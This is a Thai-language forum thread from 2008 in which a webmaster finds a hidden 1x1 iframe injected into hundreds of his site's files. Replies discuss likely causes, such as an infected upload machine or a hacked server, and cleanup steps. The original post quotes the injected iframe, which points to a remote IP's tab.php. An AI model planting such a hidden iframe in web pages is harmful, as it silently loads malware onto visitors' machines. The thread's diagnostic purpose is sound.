โดนฝังสคริปต์ในเว็บ โดย Godaddy

panchua555 · January 19, 2008, 12:10pm

เมื่อเช้าตื่นมาเข้าเว็บตัวเอง Firefox ปิดตัวเองไปหลายรอบก็เลยงงว่าเว็บตัวเองมีอะไร ทำไมมันต้องปิดตัวตลอด แต่มีคนมาบอกใน msn ว่าเว็บโดนไวรัสเหรอ พอดีโปรแกรมป้องกันไวรัสมันฟ้อง ผมก็เลยเข้า ftp ไปดู โดนแทรกสคริปต์มาแบบนี้

<iframe src='http://68.178.194.64/tab.php' width='1' height='1' style='visibility: hidden;'></iframe>

โดนทุกไฟล์ที่ชื่อ index และที่เป็นนามสกุล html กับ php โดนทุกโฟลเดอร์เลย 300 กว่าไฟล์ แถมยังฝังใน controlpanel จนเข้าใช้งานไม่ได้ php error ดีนะ simple search ช่วยหา ไม่งั้นเหนื่อย

ผมเคยได้ยินว่าการโดนฝังสคริปต์มาจากการโดนโทรจันจับ ftp ของเรา แต่กรณีนี้ผมว่ามันแปลกครับ เพราะผมเพิ่งฟอร์แมตได้ 2 วัน และยังไม่เคยเข้า ftp เลย

ลองไปเช็คไอพีมานะครับ http://www.whois.sc/ ได้มาแบบนี้

[quote]OrgName:

maxlogic · January 19, 2008, 12:42pm

อาจจะเป็นเครื่อง Server ของ Godaddy โดน hack อีกที

เพราะลองเปิดหน้าที่ว่า มันก็ไปเปิดขึ้นอีกทีหนึ่ง

kke · January 19, 2008, 4:06pm

อย่าลืมว่า Godaddy มีบริการ dedicated server ด้วยครับ

poomjit · January 19, 2008, 6:30pm

ขอร่วมคิดนะคะ

อ้างจะ iframe ที่ว่า มันจะวิ่งไปที่ IP : 68.178.194.64
ซึ่งเป็น IP ที่ต้องมีโดเมน จดไว้ที่ Godaddy.com
แต่มันไม่ได้แปลว่า Godaddy แอบฝัง script ไว้

ขอให้ลองเทียบเคียงกับโดเมนอย่าง hi-thaksin.org
จะพบว่า โดเมนนี้ก็ถูกจดไว้ที่ Godaddy.com
และที่สำคัญ มีการซ่อน whois info ไว้

เทียบ ip 68.178.194.64 กับ โดเมน hi-thaksin.org
จะมี nameserver ใกล้เคียงกันมาก คือเป็นของ secureserver.net

ดิฉันขอฟันธงว่า มีผู้ฝัง script ประสงค์ร้ายรายนี้

จดโดเมนไว้ที่ godaddy
ใช้บริการ hide whois ของ godaddy
godaddy ไม่ใช่ผู้แจก script ไวรัสค่ะ

สงสัยต้องหาตัวคนทำผิดใหม่ค่ะ

mean · January 19, 2008, 8:22pm

ขอช่วยพิจารณาครับ

อาจจะมีเพื่อน หรือ เราเครื่องติดไวรัสและทำการแก้ไขหรืออับโหลด ขึ้นไป (ส่วนตัวพบสาเหตุนี้มีโอกาสมากที่สุด)
อาจจะเป็นเพราะเว็บของเราอาจมีฟังก์ชั่นหรือไฟล์ หรือสคิบ มีบัก หรืออาจโดน hack
อาจมีการอับโหลดไฟล์ อื่นๆ ใดๆ ขึ้นไปเพื่อทำการ เขียนไฟล์ ที่มีอยู่ก่อน //เรื่องของ Permission
อาจเป็นเพราะเครื่อง sv โดน hack ส่วนตัวไม่เคยพบครับ

การแก้ไขให้ download source ทั้งหมดลงมาครับ
ทำการแก้ไข Replace โดยโปรแกรมพวก EditPlus สะดวกดีครับ
แล้วอับขึ้นไปใหม่

หากอับแล้ว ยังพบว่าติดอีก ลองเริ่ม Scan ไวรัสจากเครื่องเราก่อนครับ…

การสังเกตุขอบเขต ของปัญหา
ลองดูครับว่าครับที่มี code นี้ฝั่งอยู่นั้น ติดไปยังไฟล์ ต่างๆ ที่อยู่ใน directory ย่อยหรือไม่
หรือติดเพียงใน Root ของ Directory เว็บหลักเท่านั้นครับ

ลองอับเดทสคิบ หรือ หลีกเลี่ยงการใช้ โมดูล หรือ สคิบเสริมต่างๆ ที่ไม่จำเป็น หรือทำการอับเกรดเวอร์ชั่น ที่สูงขึ้น…

Jimmy · January 19, 2008, 8:28pm

น่าจะเป็นเครื่องที่ใช้ในการ upload ไฟล์นั้น ติดไวรัส Trojan JS-Agent-Q

panchua555 · January 19, 2008, 8:57pm

ขอบคุณมากครับที่ช่วยวินิจฉัย ตอนนี้เริ่มโดนบ่นแล้ว เพราะคนเข้าเว็บผมก่อน 8 โมงเช้าวันนี้ แล้วเป็นเว็บมาสเตอร์ ติดกันเป็นลูกโซ่เลย

system · May 16, 2016, 7:05am